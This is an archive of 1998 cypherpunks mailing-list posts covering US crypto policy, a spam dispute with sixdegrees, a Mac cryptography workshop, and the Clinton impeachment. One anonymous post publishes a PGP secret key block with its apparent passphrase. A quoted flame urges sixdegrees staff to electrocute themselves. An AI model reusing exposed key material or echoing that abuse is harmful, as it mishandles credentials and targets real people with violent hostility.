From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Motyka <mmotyka@lsil.com>
Date: Wed, 16 Sep 1998 20:58:36 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Gore, Others on Crypto Policy
In-Reply-To: <199809162314.TAA00055@camel14.mindspring.com>
Message-ID: <36006D6A.15DF@lsil.com>
MIME-Version: 1.0
Content-Type: text/plain



> Not a word about backdoors, TA, DIRT, keyboard snooping, covert
> chip features, compromising emanations, national technical means,
> just assurances that the plan satisfies the interests of the protectors.
>
They sound too satisfied; as if they don't really need domestic controls
anymore. I see the references to Cisco and the promotion of GAK. I
choose "d) All of the above." Have they been hanging around Intel, Sun
and Microsoft lately?

I expect also that some key congresspeople have signed up. The recent
embassy events may have eased their minds about the Constitution. Isn't
this technique referred to as the "We'd have to kill you if we told you
but if only you knew what we know..." routine? We can expect some sort
of suspension-of-the-Bill-of-Rights-if-crypto-is-involved laws to begin
their journey next year. You're free to use any crypto you want to but
if we say 'give us the key' you'll be in jail until you do, 1st, 4th and
5th be damned. Isn't that more or less the case with controlled
substances?

Need a clean machine and an on-line machine now. Copper room. Sneakernet
between the two. 
What is 'TA'?
What is 'National Technical Means'?

Mike




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 16 Sep 1998 18:19:29 +0800
To: cypherpunks@toad.com
Subject: Gore, Others on Crypto Policy
Message-ID: <199809162314.TAA00055@camel14.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



There's a transcript of today's White House press conference on
the new US encryption policy at:

   http://jya.com/vp091698.htm

VP Gore, Justice, FBI, DoD, NSA, CIA, BXA and cooperating
industry were there explaining the way it's supposed to satisfy
all interests of the agencies and a few good businesses if not 
the citizenry. 

Domestic crypto restrictions? Well, take a look at how that was 
punted. And what the FBI is setting up to see that law enforcement 
needs are met, and what DoD is planning for surveilling the globe, 
strong crypto or not.

Not a word about backdoors, TA, DIRT, keyboard snooping, covert 
chip features, compromising emanations, national technical means,
just assurances that the plan satisfies the interests of the protectors.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Brown <dbrown@alaska.net>
Date: Wed, 16 Sep 1998 22:10:42 +0800
To: mark@sixdegrees.com
Subject: Re: A personal response to your email to sixdegrees
In-Reply-To: <35FFD638.DB6920D3@sixdegrees.com>
Message-ID: <3.0.6.32.19980916190741.00a8eb80@alaska.net>
MIME-Version: 1.0
Content-Type: text/plain



And don't allow them to be listed again.....It'll only piss off more people.
  --Dave

At 10:09 AM 9/16/98 -0700, Declan McCullagh wrote:
>
>Mark, trust me on this: remove all five cypherpunks addresses from your
>lists.
>
>Really.
>
>-Declan
>
>
>On Wed, 16 Sep 1998, Mark Salamon wrote:
>
>> (I was not sure which email address to send this to, as the return
>> address was:  nobody@replay.com.  I also do not know who to address this
>> email to.)
>> 
>> I am the WHOIS contact at sixdegrees you sent this email to, and since
>> this is a peronal reply to your email, it is certainly NOT spam and I
>> would appreciate it if you would take the time to read it and respond.
>> 
>> I am very confused by your email.  I understand that you do not wish to
>> receive emails from sixdegrees, but it is very easy to solve this
>> problem.  If anyone ever sponsors you for sixdegrees, simply reply to
>> the email and put the word "remove" in the header.  (This is pretty
>> standard stuff across the Internet, as I am sure you are aware.)  If
>> that occurs, in the future we will not send emails to the email address
>> that received the original email from us.
>> 
>> Unfortunately, if you have many email addresses (as it appears, from the
>> bottom of your email), the only way for us to remove each is to have a
>> sixdegrees email go to each of these email address accounts and then
>> received a "remove" reply to each of these emails.  (We have in our
>> records references to 5 different cypherpunks email addresses: 
>> @toad.com, @cypherpunks.net, @cypherpunks.org, @algebra.com, and
>> @ssz.com.  If you wish for us not to contact you again at any of these
>> addresses, we will need to confirm that you in fact control these email
>> addresses.  The best way for you to do this is to send an email to
>> cancel@sixdegrees.com, and ask to have these email addresses removed. 
>> We will then send a reply to each email address you listed, asking you
>> to confirm that you in fact control those email addresses and wish to
>> have them removed.  Once we receive your confirmation, we will adjust
>> our records so you receive no further emails from us to those email
>> addresses.  For example, if I receive an email from you to this email, I
>> will assume that you control the @toad.com email address and I will have
>> that removed.)
>> 
>> What is confusing to me is that the email you received from sixdegrees
>> (with the subject:  Harald Fragner) is one that would be sent ONLY to a
>> CONFIRMED sixdegrees user.  That means that once upon a time, whether
>> you remember or not, you joined sixdegrees (as have over 1,000,000
>> people to date).  It also appears that you listed Harald Fragner as a
>> contact, and he recently denied his sixdegrees relationship with you. 
>> Thus, it is not surprising that you would receive emails from
>> sixdegrees, as you had registered for our service at one time.  (I
>> assume that the email address you used to register with sixdegrees was
>> the @toad.com one.)
>> 
>> sixdegrees is purely a voluntary service, and if you do not want to
>> participate in it, then we are happy to accommodate you.  We do not send
>> out spam and take great efforts to ensure that no one receives unwanted
>> email from us.
>> 
>> I look forward to receiving your reply to this email.
>> 
>> Mark Salamon
>> General Counsel
>> MacroView Communications Corp.
>> 
>> 
>> 
>> Anonymous wrote:
>> > 
>> > On Tue, 15 Sep 1998, the shitheads at sixdegrees spammed the Cypherpunks
>> > list with:
>> > 
>> > > Just a quick update from sixdegrees(tm). Unfortunately Harald
>> > > Fragner (harald@fragner.net) asked not to be listed as your
>> > > contact with sixdegrees.
>> > >
>> > > We also wanted to make sure you were aware that you currently
>> > > have no other confirmed contacts, so it will be hard for you to
>> > > have a productive sixdegrees experience. As you probably know,
>> > > without any confirmed contacts, you won't get any results from our
>> > > networking searches.
>> > >
>> > > So, we just wanted to recommend that you head over to
>> > > http://www.sixdegrees.com , log-in, and go to MY CONTACTS
>> > > to list additional relationships.
>> > >
>> > >
>> > > ====================================================================
>> > > PLEASE NOTE: All replies to this address are processed by a computer.
>> > > If you have any problems, questions or requests send an e-mail to
>> > > issues@sixdegrees.com and someone will get back to you as soon as
>> > > possible.
>> > > ====================================================================
>> > >
>> > >
>> > > E.DB.BRESP.3
>> > >
>> > >
>> > 
>> > Just a quick update from the Cypherpunks(tm). Fortunately, we don't want
>> > anything to do with your worthless, pathetic, spamming selves. We don't
>> > want to be your friends and, in fact, we'd prefer it if you would crawl
>> > under a rock and die because that seems to be the only way you'll stop
>> > spamming our mailing list.
>> > 
>> > We also wanted to make sure that you were aware that you currently
have no
>> > confirmed redeeming qualities, so it will be hard for you to be taken
>> > seriously by those of us who do have a clue. As you probably know,
without
>> > any redeeming qualities, you will get lots of results every time you send
>> > out a batch of spam.
>> > 
>> > So, we just wanted to recommend that you head on over to your bathtub
with
>> > the rest of your coworkers, fill it up, jump in together, and then
drop in
>> > a large, plugged-in, turned-on electric heater into the water and remain
>> > in until you stop twitching and cardiac activity ceases.
>> > 
>> > C.LU.EFULS.2000
>> > 
>> > You people don't give a fuck how much excrement you shoot all over the
>> > net, so long as you let people know of your pathetic, worthless,
>> > disgusting service. If you can get somebody's mailing list to relay your
>> > shit for you, so much the better, because then you don't have to
>> > personally send it.
>> > 
>> > Sorry, but I've had it with Sixdegrees. I've personally told you idiots
>> > very nicely what the Cypherpunks list is, and asked you nicely to stop
>> > spamming it. I've personally told you a method to keep people from
>> > submitting these addresses to your worthless spam haven. Other people
have
>> > done the same thing. You haven't fixed it, indicating that you don't
care.
>> > I'm no longer asking nicely.
>> > 
>> > A copy is being sent to your technical contact, on the assumption that
>> > maybe he is a little more responsible, though I doubt it.
>> > 
>> > -- The Cypherpunks List <cypherpunks@toad.com,
>> > cypherpunks@*.cyberpass.net, cypherpunks@*.ssz.com,
>> > cypherpunks@algebra.com, and others>
>> 
>> 
>> 
>> 
>
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 16 Sep 1998 18:24:33 +0800
To: cypherpunks@cyberpass.net
Subject: Announcement: Mac-Crypto Conference Oct 6-9, 1998
Message-ID: <v04011703b225f7b8e331@[139.167.130.248]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


From: vinnie@vmeng.com
Date: Wed, 16 Sep 1998 15:47:54 -0700
Subject: Announcement: Mac-Crypto Conference Oct 6-9, 1998
MIME-Version: 1.0
X-Priority: 3
To: undisclosed-recipients:;

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1





         The Membership of the Mac-Crypto List invites you to

                      The Third Annual
                          Macintosh
                Cryptography and Internet Commerce
                 Software Development Workshop


                      October 6 - 9th, 1998
                      Town Hall Auditorium
                        Apple R&D Campus
                4 Infinite Loop, Cupertino, CA, USA

            Keeping with tradition, this is still free workshop,
            but we'd *really* like it if you register (see below).

We are once again hosting our annual workshop,  where you are sure to
find the latest and greatest information about whats going on in the
Macintosh cryptography world.

A lot has happened in the past year in the world of the Internet
and Cryptography, so this year, thanks to popular demand we have
allocated more time and a larger hall for developers to talk about
what they are working on.


PRELIMINARY WORKSHOP TOPICS: (more to come)

  Introductions and Overviews:

    Intro to Crypto Systems

    Export Controls & Crypto software

    Crypto Opportunities for the Mac

   Tech Stuff:

     AppleShare Authentication Architecture

     PGPticket - A Secure Authorization Protocol

     The AltaVec PowerPC Architecture

     Apple Security Architecture Overview.

     Apple Keychain / Subwoofer update

     OpenPGP & the IETF standards process

     Overview of Crypto API's and Toolkits


  Applications of Cryptography

     RC5 cracking effort & the Mac

     PGPUAM - Appleshare Public Key Authentication

     Graphically displaying the Web of Trust

     Anonymous Communications and the Macintosh


  Open Sessions:

    As requested we scheduled lots of time for developer demos and
open
    discussions plus the much asked for and a PGP Keysigning party ...
    and plenty of time for developers to network with each other and
    Apple.

We have also left time open for a few last-minute speakers. If you
would like to present a paper or give a talk, please contact
Vinnie Moscaritolo at vinnie@apple.com

To find out more about previous Mac-Crypto workshops check out
our webpage at  http://www.vmeng.com/mc/

REGISTRATION:

 To register, complete the following form, and email it to
 mac-crypto-conference@vmeng.com with the subject line REGISTRATION

 Registration is limited to 300 attendees, so be sure to register
 early.

_______________________________________________________________________

* Name:

* Email Address:

Title:

Affliation:

Address:

Telephone:

Comments:

_______________________________________________________________________


Local Hotels:

Cupertino Inn, 800-222-4828
        Pretty much Across the Street.

Cupertino Courtyard by Marriot, 800-321-2211
        5 Minute Drive

Inn at Saratoga
        408-867-5020
        About 3 Miles

See you in Cupertino on October 6 - 9th!

Vinnie Moscaritolo
Apple World Wide Developer Support
 DSS/DH:   3F903472C3AF622D5D918D9BD8B100090B3EF042





-----BEGIN PGP SIGNATURE-----
Version: PGP 6.0

iQA/AwUBNgA9BR16LYZvFyoKEQKYAACfXK7uA40tX1DRy44zTaqkesDs5TkAoKS3
Fx/5lcgO9b6Wqfsibdpc1MRz
=c+ZP
-----END PGP SIGNATURE-----

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Wed, 16 Sep 1998 12:23:52 +0800
To: cypherpunks@einstein.ssz.com
Subject: No Subject
Message-ID: <199809161725.TAA17834@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



The magic word is totocus.

-----BEGIN PGP SECRET KEY BLOCK-----
Version: 2.6.3a-sha1
Comment: 4

lQFwAzX4QxUAAAEDAOVKclQNZ3wdYS6mLvrfzZIKBCcjDEmjyw9DzXYUqqWbfoby
ex+WMPyvYctHecHZyTyWPR/B7Nn1wx0FI8KTC33O7GqrhaFfXXyhRn1VAJbibL7g
O4123prR91OxIZmdNQAFEQFllMHKKfsiYAL8yA9nOEYQriDdduVXNCu/JMaSAyJC
NEdCQVOFFYture82kp1fZJkwk5eegH06NBEkyX7Uo11EbUHYJa/ozTNUpE628RBV
VtpwNcI1jbTHfbMwpIC3NBf4yFScb1ZpH49dAYCfqeL5sq+vPY1uaPQ8ZuPYR5z8
XGkDuYIx8RJickonaME8JF8CWB51k65mFP6wGfgBgLJSCmlx+gI75D5395lne2Go
KAZkKkfQNMkghXQAlRxMUOiXCPMB+9ZksY1+thjrngGAQSm6+JK1us4MggXp+4ux
rfhmD3sz9jFVDfuJUT0Ql0VAyrNkyL+4q5Erx1A8RwMbe/e0B1RPVE9DVVOJAHUD
BRA1+EMV0fdTsSGZnTUBAdLwAwDK51iax96YezcrSdB1h2menS0m3gjzzluzzRxQ
y56rD0ZCkLtOBZVoCty7hwLW9ot1h1wkVeaaqUGv1We0BG/6iw8i05FBv/A5D+kV
NafvNDnoYjUZts+0Io0MrfVtRf8=
=qp7F
-----END PGP SECRET KEY BLOCK-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Wed, 16 Sep 1998 20:40:18 +0800
To: underwood@whitman.edu
Subject: bill soper & brains
Message-ID: <36006423.7B29@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain

Wednesday 9/16/98 6:56 PM

Underwood 

More than 40 years ago Armand [bunky] Larive, I, and others took
history of philosphy from bill soper.

Laivre is an an episcopal priest in Pullman now.
http://www.web-x.com/wazzu.net/restaurantguide/index.html

I don't see sopher listed in the faculty directory.
http://people.whitman.edu/faculty_homepages.html

Sopher invited an attractive articulate lady from the B'Hai religion
to lecture our class.

The LADY put forth an argument on why we should all believe.

In the next lecture Soper, as a philospher should, went into 
every detail why her arguments were falacious.

           The contemplation of things as they are,       
                without error or confusion,       
            without substitution or imposture,       
   is in itself a nobler thing than a whole harvest of invention.       
       
   Francis Bacon        


I think Lairve was present at the lecture and analysis.

I PROFITED FROM YOUR differential equations AND 
elementary mathematics from an advanced standpoint courses.
But this has been about 40 years ago.

I still have the books used in your classes.

And my education at Whitman.

Then, too, I profited from Zirakzaheh's higher alegraba course in the 
summer of 1958 at U Colorado.

Let's hope this gets settled before someone gets NUKED.

We know these guys. http://www.wpiran.org/  http://www.taliban.com/
http://www.netlink.co.uk/users/impact/namir/namirm.html

And we SPECULATE that they are NOT HAPPY ABOUT WHAT HAPPENED.

bill
----
Subject: 
        Politicians, lawyers, and crypto
  Date: 
        Wed, 16 Sep 1998 16:50:15 -0600
  From: 
        bill payne <billp@nmol.com>
    To: 
        john_ashcroft@ashcroft.senate.gov


Subject: 
        Politicians, lawyers, and crypto
  Date: 
        Wed, 16 Sep 1998 16:48:32 -0600
  From: 
        bill payne <billp@nmol.com>
    To: 
        senator_leahy@leahy.senate.gov, conrad_burns@burns.senate.gov


Subject: 
        Politicians, lawyers, and crypto
  Date: 
        Wed, 16 Sep 1998 16:46:11 -0600
  From: 
        bill payne <billp@nmol.com>
    To: 
        john_kerry@kerry.senate.gov


Subject: 
        Politicians, lawyers, and crypto
  Date: 
        Wed, 16 Sep 1998 16:44:26 -0600
  From: 
        bill payne <billp@nmol.com>
    To: 
        info@kyl.senate.gov
    CC: 
        senator_mccain@mccain.senate.gov, grassley
<chuck_grassley@grassley.senate.gov>, cynthia mckinney
<CYMCK@mail.house.gov>


Kyl

I am reading http://www.cdt.org/crypto/jonkyl.html

Please help get this MESS settled.

bill

----

Subject: 
        crypto nonsense
  Date: 
        Wed, 16 Sep 1998 16:38:25 -0600
  From: 
        bill payne <billp@nmol.com>
    To: 
        abd@cdt.org, info@cdt.org, webmaster@cdt.org


CHRYSLER AWARD NOMINATION STATEMENT
                                9/16/9812:50 PM
                        
American forefathers drafted the Constitution and laws of our country
shortly after having suffered injustice.   
Fresh in their minds were strategies used by their oppressors.  Writers
of the Constitution and laws anticipated 
ways to subvert our system.  Therefore, our forefathers designed
safeguards into our legal system to prevent 
future injustice.

But these safeguards DON'T appear to be working today.

Morales and Payne designed a strategy using the National Security Agency
[NSA], Sandia National 
Laboratories, the US Federal Court System, and publication on Internet
to illustrate how the US government 
has deteriorated.

Arthur Morales WAS a supervisor at Sandia Labs in 1991.  Morales and
Manuel Garcia organized a class 
action lawsuit on behalf of Hispanics against Sandia.

Sandia settled Morales' and Garcia's lawsuit.  Department of Energy
acknowledged from Freedom of 
Information Act  [FOIA] requests that as of  December 31, 1995 Morales
cost Sandia $567,137 in legal fees.

Sandia retaliated against Morales.  Morales sued Sandia in New Mexico
District Court.  Morales lost.

William Payne wrote a technical report describing 'deficiencies'  in
NSA's cryptographic algorithms 
http://jya.com/da/whpda.htm.  Sandia transferred Payne to break
electronics locks for the Federal Bureau of 
Invesitgation [FBI].  Payne refused to do illegal work. 
http://www.jya.com/whp1.htm.

Payne sued Sandia in Federal Court.  Payne lost and court records were
sealed.

FBI agent Bernardo Perez  led a class action lawsuit against the FBI for
race discrimination against Hispanic
FBI agents.  http://www.usdoj.gov/osg/1995/w951482w.txt

Perez won.  Perez was assigned agent-in-charge of the FBI in Albuquerque
for settlement.  But Perez lost
money.

Morales and Payne learned that the FBI extorted an inexpensive
settlement from Perez by telling Perez that the FBI was GUARANTEED to
win on appeal in Federal Circuit.

With Perez' and others knowledge of circuit courts, Morales and Payne
appealed their respective cases pro se 
to the Tenth Circuit.  

In Payne's case Sandia failed to submit its Brief of the Appellees on
time.  Then falsified its certificate of 
service when Payne filed to remand.

In Morales' case Sandia submitted a deficient Brief of the Appellees
which was returned but failed to serve 
Morales with its  brief.

Payne and Morales both won at the Tenth Circuit on technicalities.  But
judges awarded the wins to Sandia.

All attempts by Morales and Payne to get copies of the docket for their
respective Tenth Circuit cases failed.

Therefore, Morales and Payne hatched a plan to get the dockets and
expose government misconduct.  

Payne previously made FOIA requests to NSA for  copies of messages and
translations given to 
Iraq during the Iraq/Iran war, copies of Libyan messages intercepted by
NSA, and NSA cryptographic
algorithms Payne thought contained deficiencies.

Morales and Payne sued NSA pro se for the documents. Lawsuit progress
was broadcast on Internet through e-
mail and

     http://www.aci.net/kalliste/speccoll.htm
     http://jya.com/whpfiles.htm

And Payne wrote

 Black and White Test of Cryptographic Algorithms

criticizing the US government's crypto contest.  http://zolatimes.com.

Morales and Payne FINALLY got copies of dockets from their respective
cases from the Tenth
Circuit using Internet as an innovative tool. 
/\/\/\/\/\/\

Date: Wed, 09 Sep 1998 11:08:39 -0700
From: The Electronic Zola <ezola@lfcity.com>  
To: biru
Subject: Re: Interested LATER?


Hi Biru,

> In
> 
>  Non-random Cryptographic Keys Defeat Key Escrow
> 
> I will introduce, by example, readers to deBruijn diagrams and
> statistical tests.
> Both will be related to random number and pseudorandom number
> generation.

Sounds good to us.  

We know mathematics scares our readers.  But some of our 
editors like it just fine.  And we don't care much for
the Great Satan around here.

Cheers,

Z

---
I am not reading e-mail.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Wed, 16 Sep 1998 12:28:52 +0800
To: cypherpunks@Algebra.COM
Subject: No Subject
Message-ID: <199809161729.TAA18190@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



On Feb. 1, 1996, the US House of Representatives
voted to pass the Telecommunications Reform Act. 

This Act included the Communications Decency Act,
which sought to criminalize posting to the
Internet any material deemed indecent and patently
offensive, with no exception for socially
redeeming material. 

On Sept. 11, 1998, the US House of Representatives
voted to release the Referral of Independent
Counsel Starr on the Internet. 

365 individuals were Members of Congress during
these two votes, 196 Republicans and 169
Democrats. 

Of that total, 284, or 77.6%, voted Aye both
times. 

185 of the Republicans, or 94.4%, voted Aye both
times. 

96 of the Democrats, or 56.8%, voted Aye both
times. 

Had the Communications Decency Act withstood
judicial review (which it did not), posting the
Starr report to the Internet arguably would have
subjected the posters to fines of $250,000 and 5
years in prison. 

The question of who voted for both the CDA and the
release of the Starr report is not cut-and-dried,
because Congress did not record a roll-call vote
for the CDA in isolation, but only for its vehicle
the Telecommunications Reform Act. Also, the vote
Friday to post the Starr report was primarily a
vote to start up impeachment machinery. 

Nevertheless, if accountability to the voters
means anything in this democracy, the Congress
members who voted "Aye" on both February 1, 1996
and September 11, 1998 ought to come in for a bit
of uncomfortable public exposure. 


<href=http://www.tbtf.com/resource/hypocrites.html>http://www.tbtf.com/resource/hypocrites.html</a>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jan Dobrucki <jdobruck@kki.net.pl>
Date: Wed, 16 Sep 1998 12:28:50 +0800
To: cypherpunks@cyberpass.net
Subject: Re: A personal response to your email to sixdegrees
In-Reply-To: <199809152257.AAA05080@replay.com>
Message-ID: <35FFF6A5.30B15074@kki.net.pl>
MIME-Version: 1.0
Content-Type: text/plain



Well... so far this is the longest response from sixdegrees I've read
on cypherpunks... those guys are such numbskulls... can't they just go
to the cypherpunk homepage, at:
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/Home.html 
get the info to get themselves of the cypherpunk mailing list...?

And about folks on the list... seems awfully quite...


Ende
Jan D.

P.S. :I remember this from a comic film... robo something...
"Information is Ammunition"
Mark Salamon wrote:
> 
> (I was not sure which email address to send this to, as the return
> address was:  nobody@replay.com.  I also do not know who to address this
> email to.)
> 
> I am the WHOIS contact at sixdegrees you sent this email to, and since
> this is a peronal reply to your email, it is certainly NOT spam and I
> would appreciate it if you would take the time to read it and respond.
> 
> I am very confused by your email.  I understand that you do not wish to
> receive emails from sixdegrees, but it is very easy to solve this
> problem.  If anyone ever sponsors you for sixdegrees, simply reply to
> the email and put the word "remove" in the header.  (This is pretty
> standard stuff across the Internet, as I am sure you are aware.)  If
> that occurs, in the future we will not send emails to the email address
> that received the original email from us.

(remainder of the nonsense I don't care to read is cut)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Edwin E. Smith" <edsmith@IntNet.net>
Date: Wed, 16 Sep 1998 19:01:47 +0800
To: Elizabeth Sandage <esandage@soltec.net>
Subject: Re: Voices
In-Reply-To: <3.0.2.32.19980915225715.007afe50@mailhost.IntNet.net>
Message-ID: <3.0.2.32.19980916195534.008081d0@mailhost.IntNet.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Thank you for your thoughtful and honest response.

I am interested in the two meanings of "Just". When you say you have 
blind spots do you mean that you delude yourself in some ways? I 
would say this is true of all of us, however I would say that by 
recognizing that you do have shortcomings you are making an effort at 
improving. I also have many shortcomings and I am trying to improve.

I tend to be rather intolerant of stupid people who think they are so 
superior and that their way is the only way people should live. They 
will never hesitate to lecture others about their concept of 
morality, which usually involves the use of weapons and stealing, for 
the greater good. Such is the morality of the current occupant of the 
Whitehouse.

I tend to lecture people about the value of freedom and peaceful 
persuasion to get what I want. It is a benifit to many to trade 
peacefully rather than take what we want by force. This is my concept 
of what is just. It is my concept of the "Greater Good." I carry this 
to the extreme that if it comes down to the issue of if my survival 
can only be secured by the use of force to steal from others thereby 
taking their life or any part of it, then it is right that I should 
die.

I don't have any children so I cannot say what I would do if it came 
down to the life of one of mine. I would be very much more tolerant 
of a mother who was put in this situation.

I once, long ago had it explained to me the difference between 
charity and welfare. Don Tarbell explained that if he were to see a 
person who was starving. He would help them in whatever way he wanted 
short of stealing. Welfare on the other hand steals from people who 
might have contributed voluntarily but then resent being forced to 
help. Welfare is unjust.

I have recently began reading what promises to be a very good book. 
It is "People of the Lie" by M. Scott Peck M. D. It is about human 
evil. One of the responses to a quote from the book which I posted 
was "Ask the antelope if he thinks the lion is evil, perhaps you have 
this view because no animal considers you a tasty morsel."

This is non-responsive in that we are talking about Human Evil and 
BTW there are many animals which would consider me much more than a 
"tasty morsel." We have very large aligators here in Florida which 
often eat small children, however very few people consider them evil 
by human standards, they are simply doing what they do.

The difference is that humans have, by deciding to be civil toward 
one another, decided that they will not eat each other and eat lower 
forms of life instead. Perhaps we should ask cows if they think WE 
are evil.

As to freedom of speech. I believe that I have much to gain by 
listening to what others have to say. This is a rational attitude I 
think because communication is what separates us from the lower forms 
of animals. It allows us, with our short lifespans to capitalize on 
creative ideas which our larger brains made possible. Without 
communication those ideas would die with us. We would be very little 
better off than chimpanzies. Perhaps able to fashion tools but unable 
to show others how to do the same. Each creation would have to be 
repeated in each individual.

But because I can communicate that idea which I have created to 
another, even though I didn't act upon it, the idea will outlive me 
and be a benifit to many. The wheel is an invention so old that it is 
impossible to discover when it was first used. But although it was 
surely created over and over many times it's spread was accomplished 
many times faster because the concept could be drawn on the wall of a 
cave with another very useful invention. This is the vaule of 
communication and "free speech."

Speech and the written word and now the internet. Not many realize 
that the internet is the most significant advance in technological 
evolution to have happened in a very long time. Why do I say this? 
Because it has enhanced communication manyfold. Radio and TV are one-
way only and are inferior to the printing press so don''t represent 
much of an advance. Any attempt by governments to curtail this 
enhanced speech is, in my opinion evil.

Edwin


At 05:10 PM 9/16/98 -0500, you wrote:
>Am I Just?  That is a difficult question to answer because "just" 
has two
>distinctly different definitions, and several nuances in the one 
definition
>which your use of the word implies.  I am reasonable--or try to be--
but I
>do have my blind spots.  Also, I am "just" in that I recognized in 
your
>statement about "voices" the essence of a healthy belief in freedom 
of
>speech with your strongly stated recognition that it is an 
endangered
>freedom when access to the means of distributing speech is limited 
to a
>chosen few who represent a very narrow spectrum of ideas.  The 
Internet has
>provided a marvelous solution to that problem.  It will be 
fascinating to
>observe how this freedom of access to the means of distributing 
speech on a
>global scale will affect the cultures of all nations whose citizens 
are
>allowed to get "on line" and participate in the exchange of ideas 
and the
>discussion that ensues.
>
>Elizabeth
>>

-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQA/AwUBNgBP9UmNf6b56PAtEQL0PQCfdySiIPGgD0YcIhsJofO9MEDS06UAoJK9
z3c+1YDfVnq/RF9L2O1d01ei
=3hNv
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Lars Weitze" <chromedemon@netcologne.de>
Date: Wed, 16 Sep 1998 13:03:23 +0800
To: "Cypherpunks" <cypherpunks@toad.com>
Subject: Encrypting files.
Message-ID: <003d01bde1a3$c848e060$7b0000c8@chrome>
MIME-Version: 1.0
Content-Type: text/plain



Does anyone now a program for WindozeNT to store encrypted data on harddisk.
At the moment i use
ZIP-Files with a Password on them (I now it is not very secure).
I am living outside USA and do not want any software with backdoors
,"masterkeys" or stuff like that.

Thanks
ChromeDemon

--
"One dead is a tragedy, thousand deads are a statistic."
        Karl Marx

e-mail: chromedemon@netcologne.de
http://chromedemon.home.pages.de
http://www.netcologne.de/~nc-weitzela2




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Wed, 16 Sep 1998 12:59:49 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Clinton still doesnt get it
Message-ID: <199809161800.UAA20746@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Frondeur writes:

> Why do you believe the perjury case has `reasonable doubt' problems?

Watch TV and learn the answer.  It's only perjury if it's material,
and the judge said it wasn't material.

> And the abuse of power case seems thin even to a non-lawyer.  But
> where does the `executive privilege stuff' come in?  I don't see
> that Starr listed that among his possible grounds for impeachment.

Among the grounds Starr listed was Clinton's attempt to delay the
investigation by raising many legal objections. He claimed privilege,
for example, with respect to Secret Service testimony.  Most of his
efforts were ultimately overruled.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Wed, 16 Sep 1998 22:34:33 +0800
To: "Lynne L. Harrison" <cypherpunks@Algebra.COM
Subject: Re: Clinton--Why I am Chortling
In-Reply-To: <199809151339.GAA02542@proxy4.ba.best.com>
Message-ID: <199809170333.UAA10220@proxy3.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain



    --
At 06:21 AM 9/15/98 -0700, James A. Donald wrote:
> > According to the law applied to normal people, Monica was
> > the victim.

At 06:15 PM 9/15/98 -0400, Lynne L. Harrison wrote:
> What law?  This was consensual sex. 

Female subordinates have no power to consent under current
civil law, any more than children do.

If a boss has sex with a secretary, he is liable,
irrespective of her consent.

> > Also according to the law applied to normal people, 
> > Clinton was required to spill his guts about all of his
> > sex life, because some woman sued him, whereas the woman
> > suing was completely protected against any questions
> > concerning her sex life.

> Clinton, like anyone else, is required to tell the truth
> when being deposed or testifying in front of a Grand Jury,
> i.e., making any statement under oath.

But there are limits as to what questions he can ask his
accusers, and until recently there were limits as to what
question his accusers could ask him.  The limits have been
abolished for one side, and tightened for the other side.

These laws are flagrantly unjust, but the Democrats
introduced them and applied them.  Feminists supported and
continue to support Clinton precisely because he supported
and supports laws that he flagrantly broke.  If these laws
are to be repealed for politicians, they should be repealed
for normal people as well.

    --digsig
         James A. Donald
     6YeGpsZR+nOTh/cGwvITnSR3TdzclVpR0+pr3YYQdkG
     QB9Z4ortNHgkN9yG7H79cPWyP8aJ14vaNHIzH2mw
     4e/ezaLT9rXZibxZ66vyTVK4/ZHHPiLy3k+K5WHn3
-----------------------------------------------------
We have the right to defend ourselves and our property, because 
of the kind of animals that we are. True law derives from this 
right, not from the arbitrary power of the omnipotent state.


http://www.jim.com/jamesd/      James A. Donald




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Technical Incursion Countermeasures <lists@ticm.com>
Date: Wed, 16 Sep 1998 07:38:31 +0800
To: cypherpunks@toad.com
Subject: CFP: The Insider December 1998 edition v2
Message-ID: <3.0.3.32.19980916202647.009069d0@localhost>
MIME-Version: 1.0
Content-Type: text/plain



(note: Due to the unexpected load on our systems - anyone who subscribed or
sent us mail between the 9th of Sept and the 12 of September should
consider doing it again - our server load peaked at approx 30 times the
normal daily load - so our mailbox filled. We now have expanded our mailbox
to 5M - hopefully this will be enough)

Call for Papers

The Insider - December 1998 edition

The Insider (http://www.ticm.com/info/insider/index.html) has been in
publication since November 1997. Since then it has gone trough a number of
changes - all for the better :}. The latest change is to move from a
newletter containing just the musing of its editor to a "learned journal".
